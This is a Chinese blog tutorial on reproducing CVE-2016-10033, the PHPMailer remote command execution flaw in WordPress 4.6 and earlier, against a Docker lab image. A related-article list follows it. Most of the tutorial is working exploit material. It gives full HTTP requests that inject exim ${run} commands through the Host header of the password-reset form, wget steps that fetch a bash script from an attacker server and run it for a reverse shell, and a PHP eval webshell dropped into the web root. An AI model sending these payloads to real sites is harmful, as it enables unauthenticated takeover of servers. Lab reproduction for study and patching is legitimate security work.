WordPress小于等于4.6 命令执行漏洞(PHPMailer)(CVE-2016-10033)实验

WordPress4.6命令执行漏洞CVE-2016-10033)复现教程---保姆级教程 WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,(phpmailer组件调用linux系统命令sendmail进行邮件发送,通过传入的SERVER_NAME获取主机名(即请求host值),而SERVER_NAME没有经过任何过滤,从而产生漏洞,而exim4替代了sendmail的功能,即可以利用substr,run函数等进入绕过,构造payload)造成远程命令执行 阅读详情

WordPress <= 4.6 命令执行漏洞(PHPMailer)(CVE-2016-10033)实验

0x00

此漏洞利用的是HTTP头部注入,参考资料:http://www.freebuf.com/articles/web/164817.html

首先祭出实验来源:http://vulapps.evalbug.com/w_wordpress_6/

实验环境需要docker来挂载,docker安装教程:https://blog.csdn.net/levones/article/details/80474994

0x01

WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也可以把 WordPress 当作一个内容管理系统(CMS)来使用。WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,造成远程命令执行的危害。

0x02

拉取镜像到本地计算机(ubuntu16.04)

docker pull medicean/vulapps:w_wordpress_6

启动实验环境

docker run -d -p 8000:80 medicean/vulapps:w_wordpress_6

C4VEr9.png

C4VeV1.png

C4VAKJ.png

如果上述步骤没有出现错误的话访问ip:port可以看到如下界面:

C4VmUx.png

0x03

POC

POST /wp-login.php?action=lostpassword HTTP/1.1
Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}var${substr{0}{1}{$spool_directory}}www${substr{0}{1}{$spool_directory}}html${substr{0}{1}{$spool_directory}}test}} null)
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Content-Length: 56
Content-Type: application/x-www-form-urlencoded

wp-submit=Get+New+Password&redirect_to=&user_login=admin

将此poc通过burp suite进行重放,IP和端口自行设定。重放前访问http://ip:port/test时返回404

C4VFv4.png

重放后再次访问会返回200ok,此时说明POC中执行的命令:

/bin/touch /var/www/html/test

执行成功,由此验证了此版本的WordPress存在命令执行漏洞。

0x04

EXP 利用漏洞

思路一:直接进行命令执行反弹shell

通过wget下载bash脚本然后执行

注意事项:

  1. 远程 URL 中不要有 http://
  2. 所有字母必须小写
  3. 所有 / 用 ${substr{0}{1}{$spool_directory}} 代替
  4. 所有 空格 用 ${substr{10}{1}{$tod_log}} 代替

下载:

/usr/bin/wget --output-document /tmp/rce your_server_ip/example.txt
POST /wp-login.php?action=lostpassword HTTP/1.1
Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}rce your_server_ip${substr{0}{1}{$spool_directory}}example.txt}} null)
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Content-Length: 56
Content-Type: application/x-www-form-urlencoded

wp-submit=Get+New+Password&redirect_to=&user_login=admin

执行:

/bin/bash /tmp/rce
POST /wp-login.php?action=lostpassword HTTP/1.1
Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}bash${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}rce}} null)
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Content-Length: 56
Content-Type: application/x-www-form-urlencoded

wp-submit=Get+New+Password&redirect_to=&user_login=admin
思路二:写入webshell再用菜刀连接
/usr/bin/wget --output-document /var/www/html/webshell.php raw.githubusercontent.com/medicean/vulapps/master/w/wordpress/6/webshell.php

注意事项:

  1. 远程 URL 中不要有 http://
  2. 所有字母必须小写
  3. 所有 / 用 ${substr{0}{1}{$spool_directory}} 代替
  4. 所有 空格 用 ${substr{10}{1}{$tod_log}} 代替

重放包:

POST /wp-login.php?action=lostpassword HTTP/1.1
Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}var${substr{0}{1}{$spool_directory}}www${substr{0}{1}{$spool_directory}}html${substr{0}{1}{$spool_directory}}webshell.php${substr{10}{1}{$tod_log}}raw.githubusercontent.com${substr{0}{1}{$spool_directory}}medicean${substr{0}{1}{$spool_directory}}vulapps${substr{0}{1}{$spool_directory}}master${substr{0}{1}{$spool_directory}}w${substr{0}{1}{$spool_directory}}wordpress${substr{0}{1}{$spool_directory}}6${substr{0}{1}{$spool_directory}}webshell.php}} null)
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Content-Length: 56
Content-Type: application/x-www-form-urlencoded

wp-submit=Get+New+Password&redirect_to=&user_login=admin

重放此数据包后网站根目录下多了一个webshell.php

<?php @eval($_POST['ant']);?>

此时可以用菜刀连接发现连接成功。

C4VVbR.png

Web安全 -- CVE-2016-10033漏洞 引言CVE-2016-10033漏洞背景独立研究人员Dawid Golunski发现该漏洞—远程攻击者利用该漏洞,可实现远程任意代码在web服务器上执行,并使web应用陷入威胁中。攻击者主要在常见的web表单如意见反悔表单、注册表单中 ,邮件密码重置表单等使用发送的组建时利用此漏洞漏洞影响的版本PHPMailer < 5.2.18环境搭建模拟如图网络环境web服务器配置web服务器的系统为cent 阅读详情

相关推荐

wordpress 4.6 RCE漏洞利用(CVE-2016-10033

一、漏洞描述: 当WordPress 使用 PHPMailer 组件向用户发送邮件。攻击者在找回密码时会使用PHPmailer发送重置密码的邮件,利用substr(字符串截取函数)、$run(系统调用函数)等构造payload,即可进行远程命令执行 二、影响版本 WordPress <= 4.6.0 PHPMailer < 5.2.18 三、漏洞搭建 vulhub下载,傻瓜式安装,然后漏洞在密码重置这个页面 四、漏洞利用 1、抓包,构造POST /wp-login.p

xiaobai_20190815的博客 5937

【WEB攻防】WordPress <= 4.6 命令执行漏洞(PHPMailer)(CVE-2016-10033) 安鸾靶场详细复现 -WordPress1

中华人民共和国网络安全法(出版物)_360百科中华人民共和国网络安全法,《中华人民共和国网络安全法》是为保障网络安全,维护网络空间主权和国家安全、社会公共利益,保护公民、法人和其他组织的合法权益,促进经济社会信息化健康发展而制定的法律。《中华人民共和国网络安全法》由中华人民共和国第十二届全国人民代表大会常务委员会第二十四次会议于2016年11月7日通过,自2017年6月1日起施行。https://baike.so.com/doc/24210940-24838928.html 目录 漏洞简介 工具 题

AAAAAAAAAAAA66的博客 2494

wordpress 命令执行CVE-2016-10033)复现

wordpress 远程命令执行CVE-2018-15877) wordpress 远程命令执行CVE-2018-15877)0x01 漏洞描述0x02 影响范围0x03 漏洞复现0x04 漏洞修复 wordpress 远程命令执行CVE-2018-15877) WordPressWordPress软件基金会的一套使用PHP语言开发的博客平台,该平台支持在PHP和MySQL的服务器上架设个人博客网站。 0x01 漏洞描述 Plainview Activity Monitor plugin是使用

YouthBelief的博客 4141

CVE漏洞复现-CVE-2016-10033-远程命令执行

PHPMailer是一个基于PHP语言的邮件发送组件,被广泛运用于诸如、Drupal、1CRM、SugarCRM、Yii、Joomla等用户量巨大的应用与框架中。CVE-2016-10033PHPMailer中存在的高危漏洞,这个高危漏洞是由 class.phpmailer.php 没有正确处理用户的请致的攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,造成远程命令执行的危害。:小于 5.2.18 版本。

把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己.... 2553

WordPress 4.6(PHPMailer)命令执行漏洞 (CVE-2016-10033)

WordPress &lt;= 4.6 命令执行漏洞(CVE-2016-10033) 漏洞概述: 当WordPress 使用 PHPMailer 组件向用户发送邮件。攻击者在找回密码时会使用PHPmailer发送重置密码的邮件,利用substr(字符串截取函数)、$run(系统调用函数)等构造payload,即可进行远程命令执行漏洞版本: WordPress &lt;= 4.6.0 PH...

SoulCat 5062

WordPress4.6 PHPMailer漏洞(CVE-2016-10033)实战:从环境搭建到RCE利用全解析

本文详细解析了WordPress 4.6PHPMailer组件存在的远程命令执行漏洞CVE-2016-10033)。通过Docker环境搭建、漏洞原理深度剖析,并逐步演示了从命令执行到写入Webshell、反弹Shell获取交互式控制权的完整复现与利用过程,为理解Web安全漏洞链提供了经典案例。

weixin_29326909的博客 882

WordPress CVE-2016-10033漏洞复现:从PHPMailer命令注入到RCE深度剖析

命令注入是Web安全中一种经典的攻击方式,其原理在于应用程序将用户输入未经充分过滤便拼接至系统命令中执行,导致攻击者能够突破应用逻辑,在服务器上运行任意指令。这种漏洞的技术价值在于揭示了数据与代码边界混淆所带来的高风险,常见于邮件处理、文件操作等调用系统外壳命令的场景。本文聚焦于一个典型案例——WordPressCVE-2016-10033漏洞,该漏洞正是由于PHPMailer组件对用户可控的邮件发件人地址过滤不足,将其直接传递至PHP的mail()函数及底层sendmail程序,最终构造出包含${run

weixin_30274627的博客 426

Vulfocus-WordPress远程命令执行(CVE-2016-10033)

漏洞名称:WordPress远程命令执行(CVE-2016-10033)漏洞描述:WordPress 4.6 远程代码执行漏洞漏洞主要是 PHPMailer 漏洞CVE-2016-10033)在 WordPress Core 代码中的体现,该漏洞不需要任何的验证和插件,在默认的配置情况下就可以利用。远程攻击者可以利用该漏洞执行代码。当WordPress 使用 PHPMailer 组件向用户发送邮件。

qq_52178795的博客 1358

PHPMailer漏洞实战:从CVE-2016-10033看老旧组件如何成为WordPress的安全噩梦

本文深入剖析了CVE-2016-10033漏洞,揭示了PHPMailer组件在WordPress中的安全风险。该漏洞允许攻击者通过构造恶意发件人地址实现远程命令执行,无需身份验证即可威胁站点安全。文章详细解读了漏洞原理、修复方案,并提供了针对老旧第三方组件的依赖管理策略与系统加固建议,帮助管理员有效防范此类安全威胁。

weixin_29314405的博客 373

WordPress邮件组件漏洞CVE-2016-10033:从PHPMailer参数注入到RCE实战

在Web应用开发中,邮件发送功能是常见需求,通常通过PHP的mail()函数或第三方库如PHPMailer实现。其原理是应用层调用系统底层的sendmail程序处理邮件投递。当用户输入(如邮件地址)未经严格过滤直接传递给这些函数时,就可能发生参数注入攻击,攻击者可通过注入空格和命令行参数(如-X)操纵sendmail的行为。这种漏洞的技术价值在于它绕过了应用层逻辑,直接影响了系统命令执行,常被用于获取服务器控制权。在内容管理系统(CMS)如WordPress中,由于广泛集成PHPMailer等组件,一旦存在

466

手把手复现WordPress CVE-2016-10033漏洞:Docker靶场与PHPMailer参数注入实战

命令注入是一种常见的安全漏洞,攻击者通过操纵应用程序的输入参数,将恶意系统命令嵌入到预期指令中,从而在服务器上执行任意代码。其原理在于应用程序未对用户输入进行充分验证和过滤,直接将输入拼接至系统命令或脚本中执行。这种漏洞的技术价值在于它直接威胁服务器安全,可能导致数据泄露、系统完全沦陷等严重后果,常见于调用外部程序(如邮件发送、文件处理)的Web应用场景。本文聚焦于一个经典案例——WordPress核心组件PHPMailer的参数注入漏洞CVE-2016-10033),通过构建Docker隔离环境,并利用

weixin_29327977的博客 274

PHPMailer 命令执行漏洞CVE-2016-10033)分析

PHPMailer是一个基于PHP语言的邮件发送组件,被广泛运用于诸如WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等用户量巨大的应用与框架中。 CVE-2016-10033PHPMailer中存在的高危安全漏洞,攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,造成远程命令执行的危害。 对比一下新老版本: https://github

浮生若梦的专栏 9661

php100漏洞,【漏洞分析】CVE-2016-10033PHPMailer远程代码执行漏洞的分析

预估稿费:70RMB(不服你也来投稿啊!)投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿0x00前言PHP是一种开源的脚本语言,被用来嵌入HTML做Web开发。它有9百万用户,并且被许多流行的工具使用,例如WordPress、Drupal、Joomla!等。这周一个高危安全更新用来解决PHPMailer的远程代码执行漏洞CVE-2016-10033。它是PHP网站发送邮件的...

weixin_36312271的博客 477

docker复习:CVE-2016-10033验证

复习目的:回顾docker命令、了解漏洞利用过程 准备:docker虚拟机、exp脚本、kali 漏洞描述: WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也可以把 WordPress 当作一个内容管理系统(CMS)来使用。 WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击者只需巧妙地构...

zh的博客 730

CVE-2016-10033PHPMailer 远程代码执行漏洞

漏洞简介 PHPMailer是一个非常强大的 php发送邮件类,可以设定发送邮件地址、回复地址、邮件主题、html网页,上传附件,并且使用起来非常方便。 PHPMailer由于钓鱼系统sendmail命令,并且没有对输入做限制,攻击者可以通过利用 –X 参数把恶意代码写入 PHP 文件,达到执行命令的效果。 PHPMailer百度百科 利用条件 :PHP没有开启safe_mode(默认) 影响版本 :<5.2.18版本 漏洞复现 1.启动docker服务 service docker start 2

weixin_45253622的博客 2388

PHPMailer远程代码执行漏洞复现2:原理详解+MSF法渗透实战(CVE-2016-10033 Raven2靶机)

本文通过Kali攻击机对Vulnhub的Raven2靶机进行渗透测试,发现并利用PHPMailer 5.2.16版本的远程代码执行漏洞CVE-2016-10033)。通过MSF法渗透成功在目标服务器上生成Webshell并获取反弹Shell。测试过程中发现目标系统存在目录遍历漏洞并获取首个flag。利用Metasploit框架配置PHPMailer漏洞利用模块,最终在/var/www/目录下找到flag2.txt,并在WordPress上传目录中发现flag3.png图片。

mooyuan的网络安全博客 1081

[Vulfocus解题系列] WordPress远程命令执行CVE-2016-10033

漏洞介绍 名称: wordpress 远程代码执行 (CVE-2016-10033) 描述: WordPressWordpress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 WordPress 4.6 远程代码执行漏洞漏洞主要是 PHPMailer 漏洞CVE-2016-10033)在 WordPress Core 代码中的体现,该漏洞不需要任何的验证和插件,在默认的配置情况下就可以利用。远程攻击者可以利用该漏洞执行代码。 影响版本 WordPr

00勇士王子的博客 3061

WordPress远程命令执行

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接:https://mp.csdn.net/mdeditor/103079416 漏洞信息 漏洞编号:CVE-2016-10033 漏洞简述:WordPress 4.6 版本远程代码执行漏洞是一个非常严重的漏洞,未经授权的攻击者利用该漏洞就能实现远程代码执行,针对目标服务器实现即时访问,...

harker_20的博客 1262
上一篇: Ubuntu16.04安装和配置Docker
下一篇: Tomcat 远程代码执行漏洞 (CVE-2017-12615)
Hvnt3r
博客等级 码龄9年 52粉丝 45原创
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值